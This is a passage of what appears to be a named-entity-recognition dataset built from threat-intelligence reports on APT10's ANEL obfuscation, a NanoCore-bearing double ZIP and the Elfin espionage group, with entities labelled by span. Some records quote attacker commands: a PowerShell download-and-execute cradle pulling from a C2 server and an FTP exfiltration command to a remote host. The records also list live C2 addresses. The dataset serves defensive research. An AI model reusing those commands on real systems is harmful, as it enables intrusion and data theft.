"source": "aptner_train"}} {"text": "0xdead )", "spans": {}, "info": {"id": "aptner_train_000460", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000461", "source": "aptner_train"}} {"text": "The command will instruct the code to execute only opaque predicates deobfuscation in the current selected function .", "spans": {}, "info": {"id": "aptner_train_000462", "source": "aptner_train"}} {"text": "This allows an analyst to quickly check if there are any lost blocks by control flow unflattening .", "spans": {}, "info": {"id": "aptner_train_000463", "source": "aptner_train"}} {"text": "After the check ,", "spans": {}, "info": {"id": "aptner_train_000464", "source": "aptner_train"}} {"text": "the original result can be restored by using the following command :", "spans": {}, "info": {"id": "aptner_train_000465", "source": "aptner_train"}} {"text": "idc.load_and_run_plugin", "spans": {}, "info": {"id": "aptner_train_000466", "source": "aptner_train"}} {"text": "(", "spans": {}, "info": {"id": "aptner_train_000467", "source": "aptner_train"}} {"text": "“ HexRaysDeob ”", "spans": {"System: HexRaysDeob": [[2, 13]]}, "info": {"id": "aptner_train_000468", "source": "aptner_train"}} {"text": ",", "spans": {}, "info": {"id": "aptner_train_000469", "source": "aptner_train"}} {"text": "0xf001 )", "spans": {}, "info": {"id": "aptner_train_000470", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_000471", "source": "aptner_train"}} {"text": "The compiler-level obfuscations like opaque predicates and control flow flattening are started to be observed in the wild by analyst and researchers .", "spans": {}, "info": {"id": "aptner_train_000472", "source": "aptner_train"}} {"text": "Currently malware with the obfuscations is limited ,", "spans": {}, "info": {"id": "aptner_train_000473", "source": "aptner_train"}} {"text": "however TAU expects not only APT10 but also other threat actors will start to use them .", 
"spans": {"Organization: TAU": [[8, 11]], "Organization: APT10": [[29, 34]]}, "info": {"id": "aptner_train_000474", "source": "aptner_train"}} {"text": "Unfortunately ,", "spans": {}, "info": {"id": "aptner_train_000475", "source": "aptner_train"}} {"text": "in order to break the techniques we have to understand both of the obfuscation mechanisms and disassembler tool internals before we can automate the process .", "spans": {}, "info": {"id": "aptner_train_000476", "source": "aptner_train"}} {"text": "TAU modified the original HexRaysDeob to make it work for APT10 ANEL obfuscations .", "spans": {"Organization: TAU": [[0, 3]], "System: HexRaysDeob": [[26, 37]], "Organization: APT10": [[58, 63]], "Malware: ANEL": [[64, 68]]}, "info": {"id": "aptner_train_000477", "source": "aptner_train"}} {"text": "The modified code is available publically here .", "spans": {}, "info": {"id": "aptner_train_000478", "source": "aptner_train"}} {"text": "The summary of the modifications is :", "spans": {}, "info": {"id": "aptner_train_000479", "source": "aptner_train"}} {"text": "New patterns and data-flow tracking for opaque predicates .", "spans": {}, "info": {"id": "aptner_train_000480", "source": "aptner_train"}} {"text": "Analysis in multiple maturity levels ,", "spans": {}, "info": {"id": "aptner_train_000481", "source": "aptner_train"}} {"text": "considering multiple control flow dispatchers and various jump cases for control flow flattening .", "spans": {}, "info": {"id": "aptner_train_000482", "source": "aptner_train"}} {"text": "The tool can work for almost all obfuscated functions in the tested sample .", "spans": {}, "info": {"id": "aptner_train_000483", "source": "aptner_train"}} {"text": "This implementation will deobfuscate approximately 89% of encountered functions .", "spans": {}, "info": {"id": "aptner_train_000484", "source": "aptner_train"}} {"text": "This provides researchers and analyst broad tool to attack this type of obfuscation ,", "spans": {}, "info": {"id": 
"aptner_train_000485", "source": "aptner_train"}} {"text": "and if it adopted in other families .", "spans": {}, "info": {"id": "aptner_train_000486", "source": "aptner_train"}} {"text": "In should be noted that the tool may not work for the updated versions of ANEL if they are compiled with different options of the obfuscating compiler .", "spans": {"Organization: ANEL": [[74, 78]]}, "info": {"id": "aptner_train_000487", "source": "aptner_train"}} {"text": "Testing in multiple versions is important ,", "spans": {}, "info": {"id": "aptner_train_000488", "source": "aptner_train"}} {"text": "so TAU is looking for newer versions ANEL samples .", "spans": {"Organization: TAU": [[3, 6]], "Organization: ANEL": [[37, 41]]}, "info": {"id": "aptner_train_000489", "source": "aptner_train"}} {"text": "Please reach out to our unit if you have relevant samples or need assistance in deobfuscating the codes .", "spans": {}, "info": {"id": "aptner_train_000490", "source": "aptner_train"}} {"text": "Double Loaded Zip File Delivers Nanocore Most malware sent via emails is packaged in archives such as ZIP, RAR, and 7z (7-Zip ) .", "spans": {"System: emails": [[63, 69]]}, "info": {"id": "aptner_train_000491", "source": "aptner_train"}} {"text": "Occasionally, we encounter some clever and creative ways these malicious archives are crafted .", "spans": {}, "info": {"id": "aptner_train_000492", "source": "aptner_train"}} {"text": "Here we will examine an example of an oddly formatted ZIP archive hiding the NanoCore malware .", "spans": {"Malware: NanoCore": [[77, 85]]}, "info": {"id": "aptner_train_000493", "source": "aptner_train"}} {"text": "We spotted a courier themed spam campaign on our Secure Email Gateway (SEG ) cloud recently .", "spans": {"System: Secure Email Gateway": [[49, 69]], "System: (SEG": [[70, 74]]}, "info": {"id": "aptner_train_000494", "source": "aptner_train"}} {"text": "The message claimed to be from an Export Operation Specialist of USCO Logistics and that it was 
sent as per their customer request .", "spans": {"Organization: USCO Logistics": [[65, 79]]}, "info": {"id": "aptner_train_000495", "source": "aptner_train"}} {"text": "Aside from this, there were several other suspicious items we noted: Headers mismatched: The Reply-To and From email address were different .", "spans": {"System: email": [[111, 116]]}, "info": {"id": "aptner_train_000496", "source": "aptner_train"}} {"text": "Furthermore, the email address used in Reply-To is from a free email client Gmail .", "spans": {"System: email": [[17, 22], [63, 68]]}, "info": {"id": "aptner_train_000497", "source": "aptner_train"}} {"text": "Suspicious message body: The attachment was mentioned in the message body twice, making sure to direct the reader’s attention towards the attachment .", "spans": {}, "info": {"id": "aptner_train_000498", "source": "aptner_train"}} {"text": "Suspicious attachment name: The name of attachment SHIPPING_MX00034900_PL_INV_pdf.zip ends with pdf.zip .", "spans": {"Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[51, 85]], "Indicator: pdf.zip": [[96, 103]]}, "info": {"id": "aptner_train_000499", "source": "aptner_train"}} {"text": "That usually means that the name of the file inside the archive ends with 2 known file extensions “pdf.” (archiving tools usually defaults the to the archive’s format e.g. 
zip ) .", "spans": {}, "info": {"id": "aptner_train_000500", "source": "aptner_train"}} {"text": "The attachment SHIPPING_MX00034900_PL_INV_pdf.zip makes this message stand out .", "spans": {"Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[15, 49]]}, "info": {"id": "aptner_train_000501", "source": "aptner_train"}} {"text": "The ZIP file had a file size significantly greater than that of its uncompressed content .", "spans": {}, "info": {"id": "aptner_train_000502", "source": "aptner_train"}} {"text": "Typically, the size of the ZIP file should be less than the uncompressed content or, in some cases, ZIP files will grow larger than the original files by a reasonable number of bytes .", "spans": {}, "info": {"id": "aptner_train_000503", "source": "aptner_train"}} {"text": "ZIP archives are supposed to have one “End of Central Directory” (EOCD) signifying the end of the archive .", "spans": {}, "info": {"id": "aptner_train_000504", "source": "aptner_train"}} {"text": "Looking deeper into the structure of SHIPPING_MX00034900_PL_INV_pdf.zip , the attachment has two EOCDs .", "spans": {"Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[37, 71]]}, "info": {"id": "aptner_train_000505", "source": "aptner_train"}} {"text": "After the first EOCD comes some extra data – another ZIP file structure .", "spans": {}, "info": {"id": "aptner_train_000506", "source": "aptner_train"}} {"text": "It turns out that the first ZIP structure is for the image file order.jpg while the second one is for an executable file SHIPPING_MX00034900_PL_INV_pdf.exe .", "spans": {"Indicator: order.jpg": [[64, 73]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.exe": [[121, 155]]}, "info": {"id": "aptner_train_000507", "source": "aptner_train"}} {"text": "Both are compressed when archived, and both indicate that they are the only file in their ZIP structures as indicated in their local file headers and EOCDs respectively .", "spans": {}, "info": {"id": "aptner_train_000508", "source": "aptner_train"}} 
{"text": "The image file “order.jpg” contained in the first ZIP structure is actually a non-malicious PNG formatted image file .", "spans": {}, "info": {"id": "aptner_train_000509", "source": "aptner_train"}} {"text": "This serves as a decoy, an attempt to hide the content of the other ZIP structure .", "spans": {}, "info": {"id": "aptner_train_000510", "source": "aptner_train"}} {"text": "The image file has been correctly identified by SEG as a PNG when its file extension is .jpg denoting a JPEG formatted image .", "spans": {"Indicator: .jpg": [[88, 92]]}, "info": {"id": "aptner_train_000511", "source": "aptner_train"}} {"text": "The second ZIP structure contains SHIPPING_MX00034900_PL_INV_pdf.exe , which is a NanoCore RAT .", "spans": {"Indicator: SHIPPING_MX00034900_PL_INV_pdf.exe": [[34, 68]], "Malware: NanoCore": [[82, 90]]}, "info": {"id": "aptner_train_000512", "source": "aptner_train"}} {"text": "This remote access Trojan has the capability that allows an attacker to completely take control of the compromised machine .", "spans": {"Malware: Trojan": [[19, 25]]}, "info": {"id": "aptner_train_000513", "source": "aptner_train"}} {"text": "It connects to its command and control server at 194.5.98.85 on port 11903 .", "spans": {"Indicator: 194.5.98.85": [[49, 60]]}, "info": {"id": "aptner_train_000514", "source": "aptner_train"}} {"text": "This NanoCore RAT is version 1.2.2.0 which has been found to be offered for free on the Dark Web just a few months ago .", "spans": {"Malware: NanoCore": [[5, 13]], "Organization: Dark Web": [[88, 96]]}, "info": {"id": "aptner_train_000515", "source": "aptner_train"}} {"text": "We used different archiving tools such as PowerArchiver 2019 , WinZip , WinRar , 7Zip , and unzIP that is built into the Windows OS in attempting to extract the content of the attachment SHIPPING_MX00034900_PL_INV_pdf.zip .", "spans": {"System: PowerArchiver 2019": [[42, 60]], "System: WinZip": [[63, 69]], "System: WinRar": [[72, 78]], "System: 7Zip": 
[[81, 85]], "System: unzIP": [[92, 97]], "System: Windows": [[121, 128]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[187, 221]]}, "info": {"id": "aptner_train_000516", "source": "aptner_train"}} {"text": "Among these 5 tools, only WinZip and Windows’ unzIP were not able to extract anything from the ZIP file as they encountered an error at the start of the extraction process .", "spans": {"System: WinZip": [[26, 32]], "System: unzIP": [[46, 51]]}, "info": {"id": "aptner_train_000517", "source": "aptner_train"}} {"text": "The other archiving tools were able to extract one file from the ZIP attachment – either order.jpg or SHIPPING_MX00034900_PL_INV_pdf.exe .", "spans": {"Indicator: order.jpg or SHIPPING_MX00034900_PL_INV_pdf.exe": [[89, 136]]}, "info": {"id": "aptner_train_000518", "source": "aptner_train"}} {"text": "WinZip version 11.2 and 24.0, and the built-in unzIP tool in Windows , recognized that the attachment SHIPPING_MX00034900_PL_INV_pdf.zip is an invalid archive .", "spans": {"System: WinZip": [[0, 6]], "System: unzIP": [[47, 52]], "System: Windows": [[61, 68]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[102, 136]]}, "info": {"id": "aptner_train_000519", "source": "aptner_train"}} {"text": "Only WinZip gave an explicit reason – the start of central directory of the ZIP was not found .", "spans": {"System: WinZip": [[5, 11]]}, "info": {"id": "aptner_train_000520", "source": "aptner_train"}} {"text": "The central directory it pertained to is the one in the second ZIP structure .", "spans": {}, "info": {"id": "aptner_train_000521", "source": "aptner_train"}} {"text": "At figure 2, the second EOCD indicates that its only central directory is located at file offset 0xd148f whereas it is at 0xd40d41. (The size of the first", "spans": {}, "info": {"id": "aptner_train_000522", "source": "aptner_train"}} {"text": "ZIP structure was not considered.) 
Meanwhile, the archiving tools PowerArchiver 2019 , WinRar , and 7Zip were able to extract a file from the attachment SHIPPING_MX00034900_PL_INV_pdf.zip .", "spans": {"System: PowerArchiver 2019": [[66, 84]], "System: WinRar": [[87, 93]], "System: 7Zip": [[100, 104]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[153, 187]]}, "info": {"id": "aptner_train_000523", "source": "aptner_train"}} {"text": "The latest versions of PowerArchiver 2019 and WinRar displayed in their respective UI the executable SHIPPING_MX00034900_PL_INV_pdf.exe as the only content of the ZIP attachment .", "spans": {"System: PowerArchiver 2019": [[23, 41]], "System: WinRar": [[46, 52]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.exe": [[101, 135]]}, "info": {"id": "aptner_train_000524", "source": "aptner_train"}} {"text": "No error or warning was prompted during the extraction .", "spans": {}, "info": {"id": "aptner_train_000525", "source": "aptner_train"}} {"text": "Older versions of 7Zip also behave like PowerArchiver and WinRAR . 
7Zip version 9.22 and older saw the executable as well .", "spans": {"System: 7Zip": [[18, 22], [67, 71]], "System: PowerArchiver": [[40, 53]], "System: WinRAR": [[58, 64]]}, "info": {"id": "aptner_train_000526", "source": "aptner_train"}} {"text": "However, starting from 7Zip version 9.34 (next available installer after version 9.22) up to its latest version 19.0, 7zip saw and was able to extract the image file order.jpg instead .", "spans": {"System: 7Zip": [[23, 27]], "System: 7zip": [[118, 122]], "Indicator: order.jpg": [[166, 175]]}, "info": {"id": "aptner_train_000527", "source": "aptner_train"}} {"text": "The second ZIP structure was treated as extra data; hence, a warning was added to the extracted image file’s properties .", "spans": {}, "info": {"id": "aptner_train_000528", "source": "aptner_train"}} {"text": "Among the archiving tools we tried, WinRar 3.30 behaved differently and unexpectedly .", "spans": {"System: WinRar": [[36, 42]]}, "info": {"id": "aptner_train_000529", "source": "aptner_train"}} {"text": "The content of the ZIP attachment it displayed in its UI was not the one it extracted! 
This sample challenges gateways scanners .", "spans": {}, "info": {"id": "aptner_train_000530", "source": "aptner_train"}} {"text": "Depending on the type of decompression engine used, there is a good probability that only the decoy file may be scrutinized and vetted, and the malicious content unnoticed – just like how some of the most popular archiving tools failed to notice the second ZIP structure .", "spans": {}, "info": {"id": "aptner_train_000531", "source": "aptner_train"}} {"text": "Despite what the gateway does, this attack would only succeed if the message got through the gateway and a particular archive utility is used by the end-user, such as certain versions of PowerArchiver , WinRar , and older 7Zip as described above .", "spans": {"System: PowerArchiver": [[187, 200]], "System: WinRar": [[203, 209]], "System: 7Zip": [[222, 226]]}, "info": {"id": "aptner_train_000532", "source": "aptner_train"}} {"text": "In this case, the Trustwave Secure email Gateway flagged the message as suspicious and it did not get through .", "spans": {"System: email": [[35, 40]]}, "info": {"id": "aptner_train_000533", "source": "aptner_train"}} {"text": "Nevertheless, this case does highlight the types of tricks the bad guys are using in an attempt to deliver malware through email .", "spans": {}, "info": {"id": "aptner_train_000534", "source": "aptner_train"}} {"text": "SHIPPING_MX00034900_PL_INV_pdf.zip : 9474e1517c98d4165300a49612888d16643efbf6 .", "spans": {"Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[0, 34]], "Indicator: 9474e1517c98d4165300a49612888d16643efbf6": [[37, 77]]}, "info": {"id": "aptner_train_000535", "source": "aptner_train"}} {"text": "Elfin : Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S .", "spans": {"Organization: Elfin": [[0, 5]]}, "info": {"id": "aptner_train_000536", "source": "aptner_train"}} {"text": "The group , which first became active in late 2015 or early 2016 , specializes in scanning for vulnerable 
websites and using this to identify potential targets , either for attacks or creation of command and control ( C&C ) infrastructure .", "spans": {}, "info": {"id": "aptner_train_000538", "source": "aptner_train"}} {"text": "It has compromised a wide range of targets , including governments along with organizations in the research , chemical , engineering , manufacturing , consulting , finance , telecoms , and several other sectors .", "spans": {"Organization: governments": [[55, 66]]}, "info": {"id": "aptner_train_000539", "source": "aptner_train"}} {"text": "Elfin continues to be focused heavily on Saudi Arabia , which accounted for 42 percent of attacks observed by Symantec since the beginning of 2016 .", "spans": {"Organization: Elfin": [[0, 5]], "Organization: Symantec": [[110, 118]]}, "info": {"id": "aptner_train_000540", "source": "aptner_train"}} {"text": "However , the U.S. has also been a country of significant interest to the group , with 18 organizations attacked over the past three years , including a number of Fortune 500 companies .", "spans": {}, "info": {"id": "aptner_train_000541", "source": "aptner_train"}} {"text": "Elfin targets in the U.S. have included organizations in the engineering , chemical , research , energy consultancy , finance , IT , and healthcare sectors .", "spans": {"Organization: Elfin": [[0, 5]]}, "info": {"id": "aptner_train_000542", "source": "aptner_train"}} {"text": "Some of these U.S. organizations may have been targeted by Elfin for the purpose of mounting supply chain attacks .", "spans": {"Organization: Elfin": [[59, 64]]}, "info": {"id": "aptner_train_000543", "source": "aptner_train"}} {"text": "In one instance , a large U.S. 
company was attacked in the same month a Middle Eastern company it co-owns was also compromised .", "spans": {}, "info": {"id": "aptner_train_000544", "source": "aptner_train"}} {"text": "In a recent wave of attacks during February 2019 , Elfin attempted to exploit a known vulnerability ( CVE-2018-20250 ) in WinRAR , the widely used file archiving and compression utility capable of creating self-extracting archive files .", "spans": {"Organization: Elfin": [[51, 56]], "Vulnerability: CVE-2018-20250": [[102, 116]], "System: WinRAR": [[122, 128]]}, "info": {"id": "aptner_train_000545", "source": "aptner_train"}} {"text": "The exploit was used against one target in the chemical sector in Saudi Arabia .", "spans": {}, "info": {"id": "aptner_train_000546", "source": "aptner_train"}} {"text": "If successfully exploited on an unpatched computer , the vulnerability could permit an attacker to install any file on the computer , which effectively permits code execution on the targeted computer .", "spans": {}, "info": {"id": "aptner_train_000547", "source": "aptner_train"}} {"text": "Two users in the targeted organization received a file called \" JobDetails.rar \" , which attempted to exploit the WinRAR vulnerability .", "spans": {"Indicator: JobDetails.rar": [[64, 78]], "System: WinRAR": [[114, 120]]}, "info": {"id": "aptner_train_000548", "source": "aptner_train"}} {"text": "This file was likely delivered via a spear-phishing email .", "spans": {}, "info": {"id": "aptner_train_000549", "source": "aptner_train"}} {"text": "However , prior to this attempted attack , Symantec had rolled out proactive protection against any attempt to exploit this vulnerability ( Exp.CVE-2018-20250 ) .", "spans": {"Organization: Symantec": [[43, 51]], "Vulnerability: Exp.CVE-2018-20250": [[140, 158]]}, "info": {"id": "aptner_train_000550", "source": "aptner_train"}} {"text": "This protection successfully protected the targeted organization from being compromised .", "spans": {}, "info": 
{"id": "aptner_train_000551", "source": "aptner_train"}} {"text": "Elfin came under the spotlight in December 2018 when it was linked with a new wave of Shamoon attacks .", "spans": {"Organization: Elfin": [[0, 5]], "Organization: Shamoon": [[86, 93]]}, "info": {"id": "aptner_train_000552", "source": "aptner_train"}} {"text": "One Shamoon victim in Saudi Arabia had recently also been attacked by Elfin and had been infected with the Stonedrill malware ( Trojan.Stonedrill ) used by Elfin .", "spans": {"Organization: Shamoon": [[4, 11]], "Organization: Elfin": [[70, 75], [156, 161]], "Malware: Stonedrill": [[107, 117]], "Malware: Trojan.Stonedrill": [[128, 145]]}, "info": {"id": "aptner_train_000553", "source": "aptner_train"}} {"text": "Because the Elfin and the Shamoon attacks against this organization occurred so close together , there has been speculation that the two groups may be linked .", "spans": {"Organization: Elfin": [[12, 17]], "Organization: Shamoon": [[26, 33]]}, "info": {"id": "aptner_train_000554", "source": "aptner_train"}} {"text": "However , Symantec has found no further evidence to suggest Elfin was responsible for these Shamoon attacks to date .", "spans": {"Organization: Symantec": [[10, 18]], "Organization: Elfin": [[60, 65]], "Organization: Shamoon": [[92, 99]]}, "info": {"id": "aptner_train_000555", "source": "aptner_train"}} {"text": "We continue to monitor the activities of both groups closely .", "spans": {}, "info": {"id": "aptner_train_000556", "source": "aptner_train"}} {"text": "Elfin has deployed a wide range of tools in its attacks including custom malware , commodity malware , and open-source hacking tools .", "spans": {"Organization: Elfin": [[0, 5]]}, "info": {"id": "aptner_train_000557", "source": "aptner_train"}} {"text": "Custom malware used by the group include :", "spans": {}, "info": {"id": "aptner_train_000558", "source": "aptner_train"}} {"text": "Notestuk ( Backdoor.Notestuk ) ( aka TURNEDUP ) : Malware that can be used 
to open a backdoor and gather information from a compromised computer .", "spans": {"Malware: Notestuk": [[0, 8]], "Malware: Backdoor.Notestuk": [[11, 28]], "Malware: TURNEDUP": [[37, 45]]}, "info": {"id": "aptner_train_000559", "source": "aptner_train"}} {"text": "Stonedrill ( Trojan.Stonedrill ) : Custom malware capable of opening a backdoor on an infected computer and downloading additional files .", "spans": {"Malware: Stonedrill": [[0, 10]], "Malware: Trojan.Stonedrill": [[13, 30]]}, "info": {"id": "aptner_train_000560", "source": "aptner_train"}} {"text": "The malware also features a destructive component , which can wipe the master boot record of an infected computer .", "spans": {}, "info": {"id": "aptner_train_000561", "source": "aptner_train"}} {"text": "AutoIt backdoor : A custom built backdoor written in the AutoIt scripting language .", "spans": {"Malware: AutoIt backdoor": [[0, 15]]}, "info": {"id": "aptner_train_000562", "source": "aptner_train"}} {"text": "In addition to its custom malware , Elfin has also used a number of commodity malware tools , available for purchase on the cyber underground .", "spans": {"Organization: Elfin": [[36, 41]]}, "info": {"id": "aptner_train_000563", "source": "aptner_train"}} {"text": "These include :", "spans": {}, "info": {"id": "aptner_train_000564", "source": "aptner_train"}} {"text": "Remcos ( Backdoor.Remvio ) : A commodity remote administration tool ( RAT ) that can be used to steal information from an infected computer .", "spans": {"Malware: Remcos": [[0, 6]], "Malware: Backdoor.Remvio": [[9, 24]]}, "info": {"id": "aptner_train_000565", "source": "aptner_train"}} {"text": "DarkComet ( Backdoor.Breut ) : Another commodity RAT used to open a backdoor on an infected computer and steal information .", "spans": {"Malware: DarkComet": [[0, 9]], "Malware: Backdoor.Breut": [[12, 26]]}, "info": {"id": "aptner_train_000566", "source": "aptner_train"}} {"text": "Quasar RAT ( Trojan.Quasar ) : Commodity RAT that can be 
used to steal passwords and execute commands on an infected computer .", "spans": {"Malware: Quasar RAT": [[0, 10]], "Malware: Trojan.Quasar": [[13, 26]]}, "info": {"id": "aptner_train_000567", "source": "aptner_train"}} {"text": "Pupy RAT ( Backdoor.Patpoopy ) : Commodity RAT that can open a backdoor on an infected computer .", "spans": {"Malware: Pupy RAT": [[0, 8]], "Malware: Backdoor.Patpoopy": [[11, 28]]}, "info": {"id": "aptner_train_000568", "source": "aptner_train"}} {"text": "NanoCore ( Trojan.Nancrat ) : Commodity RAT used to open a backdoor on an infected computer and steal information .", "spans": {"Malware: NanoCore": [[0, 8]], "Malware: Trojan.Nancrat": [[11, 25]]}, "info": {"id": "aptner_train_000569", "source": "aptner_train"}} {"text": "NetWeird ( Trojan.Netweird.B ) : A commodity Trojan which can open a backdoor and steal information from the compromised computer .", "spans": {"Malware: NetWeird": [[0, 8]], "Malware: Trojan.Netweird.B": [[11, 28]], "Malware: Trojan": [[45, 51]]}, "info": {"id": "aptner_train_000570", "source": "aptner_train"}} {"text": "It may also download additional potentially malicious files .", "spans": {}, "info": {"id": "aptner_train_000571", "source": "aptner_train"}} {"text": "Elfin also makes frequent use of a number of publicly available hacking tools , including :", "spans": {"Organization: Elfin": [[0, 5]]}, "info": {"id": "aptner_train_000572", "source": "aptner_train"}} {"text": "LaZagne ( SecurityRisk.LaZagne ) : A login/password retrieval tool .", "spans": {"Malware: LaZagne": [[0, 7]], "Malware: SecurityRisk.LaZagne": [[10, 30]]}, "info": {"id": "aptner_train_000573", "source": "aptner_train"}} {"text": "Mimikatz ( Hacktool.Mimikatz ) : Tool designed to steal credentials .", "spans": {"Malware: Mimikatz": [[0, 8]], "Malware: Hacktool.Mimikatz": [[11, 28]]}, "info": {"id": "aptner_train_000574", "source": "aptner_train"}} {"text": "Gpppassword : Tool used to obtain and decrypt Group Policy Preferences ( GPP ) 
passwords .", "spans": {"Malware: Gpppassword": [[0, 11]]}, "info": {"id": "aptner_train_000575", "source": "aptner_train"}} {"text": "SniffPass ( SniffPass ) : Tool designed to steal passwords by sniffing network traffic .", "spans": {"Malware: SniffPass": [[0, 9], [12, 21]]}, "info": {"id": "aptner_train_000576", "source": "aptner_train"}} {"text": "In this section , we describe in detail an Elfin attack on a U.S. organization .", "spans": {"Organization: Elfin": [[43, 48]]}, "info": {"id": "aptner_train_000577", "source": "aptner_train"}} {"text": "On February 12 , 2018 at 16:45 ( all times are in the organization’s local time ) , an email was sent to the organization advertising a job vacancy at an American global service provider .", "spans": {"System: email": [[87, 92]]}, "info": {"id": "aptner_train_000578", "source": "aptner_train"}} {"text": "The email contained a malicious link to http://mynetwork.ddns.net:880 .", "spans": {"System: email": [[4, 9]], "Indicator: http://mynetwork.ddns.net:880": [[40, 69]]}, "info": {"id": "aptner_train_000579", "source": "aptner_train"}} {"text": "The recipient clicked the link and proceeded to download and open a malicious HTML executable file , which in turn loaded content from a C&C server via an embedded iframe .", "spans": {}, "info": {"id": "aptner_train_000580", "source": "aptner_train"}} {"text": "At the same time , code embedded within this file also executed a powershell command to download and execute a copy of chfeeds.vbe from the C&C server . 
[System.Net.ServicePointManager] : :S erverCertificateValidationCallback={$true};IEX (New-Object Net.WebClient ) .DownloadString ( ' https://217.147.168.46:8088/index.jpg ' ) .", "spans": {"System: powershell": [[66, 76]], "Indicator: chfeeds.vbe": [[119, 130]], "System: C&C server": [[140, 150]], "Indicator: https://217.147.168.46:8088/index.jpg": [[286, 323]]}, "info": {"id": "aptner_train_000581", "source": "aptner_train"}} {"text": "A second JavaScript command was also executed , which created a scheduled task to execute chfeeds.vbe multiple times a day .", "spans": {"Indicator: chfeeds.vbe": [[90, 101]]}, "info": {"id": "aptner_train_000582", "source": "aptner_train"}} {"text": "The chfeeds.vbe file acts as a downloader and was used to download a second powershell script ( registry.ps1 ) .", "spans": {"Indicator: chfeeds.vbe": [[4, 15]], "System: powershell": [[76, 86]], "Indicator: registry.ps1": [[96, 108]]}, "info": {"id": "aptner_train_000583", "source": "aptner_train"}} {"text": "This script in turn downloaded and executed a PowerShell backdoor known as POSHC2 , a proxy-aware C&C framework , from the C&C server ( https:// host-manager.hopto.org ) .", "spans": {"Malware: PowerShell backdoor": [[46, 65]], "Malware: POSHC2": [[75, 81]], "System: proxy-aware C&C framework": [[86, 111]], "Indicator: https:// host-manager.hopto.org": [[136, 167]]}, "info": {"id": "aptner_train_000584", "source": "aptner_train"}} {"text": "Later at 20:57 , the attackers became active on the compromised machine and proceeded to download the archiving tool WinRAR . 89.34.237.118 808 http://89.34.237.118:808/Rar32.exe .", "spans": {"System: WinRAR": [[117, 123]], "Indicator: 89.34.237.118 808": [[126, 143]], "Indicator: http://89.34.237.118:808/Rar32.exe": [[144, 178]]}, "info": {"id": "aptner_train_000585", "source": "aptner_train"}} {"text": "At 23:29 , the attackers then proceeded to deploy an updated version of their POSHC2 stager . 
192.119.15.35 880 http://mynetwork.ddns.net:880/st-36-p4578.ps1 .", "spans": {"Malware: POSHC2": [[78, 84]], "Indicator: 192.119.15.35 880": [[94, 111]], "Indicator: http://mynetwork.ddns.net:880/st-36-p4578.ps1": [[112, 157]]}, "info": {"id": "aptner_train_000586", "source": "aptner_train"}} {"text": "This tool was downloaded several times between 23:29 on February 12 and 07:47 on February 13 .", "spans": {}, "info": {"id": "aptner_train_000587", "source": "aptner_train"}} {"text": "Two days later , on February 14 at 15:12 , the attackers returned and installed Quasar RAT onto the infected computer that communicated with a C&C server ( 217.147.168.123 ) .", "spans": {"Malware: Quasar RAT": [[80, 90]], "Indicator: 217.147.168.123": [[156, 171]]}, "info": {"id": "aptner_train_000588", "source": "aptner_train"}} {"text": "Quasar RAT was installed to CSIDL_PROFILE\\appdata\\roaming\\microsoft\\crypto\\smss.exe .", "spans": {"Malware: Quasar RAT": [[0, 10]], "Indicator: CSIDL_PROFILE\\appdata\\roaming\\microsoft\\crypto\\smss.exe": [[28, 83]]}, "info": {"id": "aptner_train_000589", "source": "aptner_train"}} {"text": "At this point , the attackers ceased activity while maintaining access to the network until February 21 .", "spans": {}, "info": {"id": "aptner_train_000590", "source": "aptner_train"}} {"text": "At 06:38 , the attackers were observed downloading a custom .NET FTP tool to the infected computer . 
192.119.15.36 880 http://192.119.15.36:880/ftp.exe .", "spans": {"Malware: .NET FTP": [[60, 68]], "Indicator: 192.119.15.36 880": [[101, 118]], "Indicator: http://192.119.15.36:880/ftp.exe": [[119, 151]]}, "info": {"id": "aptner_train_000591", "source": "aptner_train"}} {"text": "Later at 6:56 , the attackers exfiltrated data using this FTP tool to a remote host: JsuObf.exe Nup#Tntcommand -s CSIDL_PROFILE\\appdata\\roaming\\adobe\\rar -a ftp://89.34.237.118:2020 -f/[REDACTED]-u[REDACTED]-p[REDACTED] .", "spans": {"System: FTP": [[58, 61]], "Indicator: JsuObf.exe": [[85, 95]]}, "info": {"id": "aptner_train_000592", "source": "aptner_train"}} {"text": "Activity ceased until the attackers returned on March 5 and were observed using Quasar RAT to download a second custom AutoIt FTP Exfiltration tool known as FastUploader from http://192.119.15.36:880/ftp.exe .", "spans": {"Malware: Quasar RAT": [[80, 90]], "Malware: AutoIt FTP": [[119, 129]], "Malware: FastUploader": [[157, 169]], "Indicator: http://192.119.15.36:880/ftp.exe": [[175, 207]]}, "info": {"id": "aptner_train_000593", "source": "aptner_train"}} {"text": "This tool was then installed to csidl_profile\\appdata\\roaming\\adobe\\ftp.exe .", "spans": {"Indicator: csidl_profile\\appdata\\roaming\\adobe\\ftp.exe": [[32, 75]]}, "info": {"id": "aptner_train_000594", "source": "aptner_train"}} {"text": "FastUploader is a custom FTP tool designed to exfiltrate data at a faster rate than traditional FTP clients .", "spans": {"Malware: FastUploader": [[0, 12]], "System: FTP": [[25, 28], [96, 99]]}, "info": {"id": "aptner_train_000595", "source": "aptner_train"}} {"text": "At this point , additional activity from the attackers continued between March 5 into April , and on April 18 at 11:50 , a second remote access tool known as DarkComet was deployed to csidl_profile\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\smss.exe on the infected computer .", "spans": {"Malware: DarkComet": [[158, 167]], 
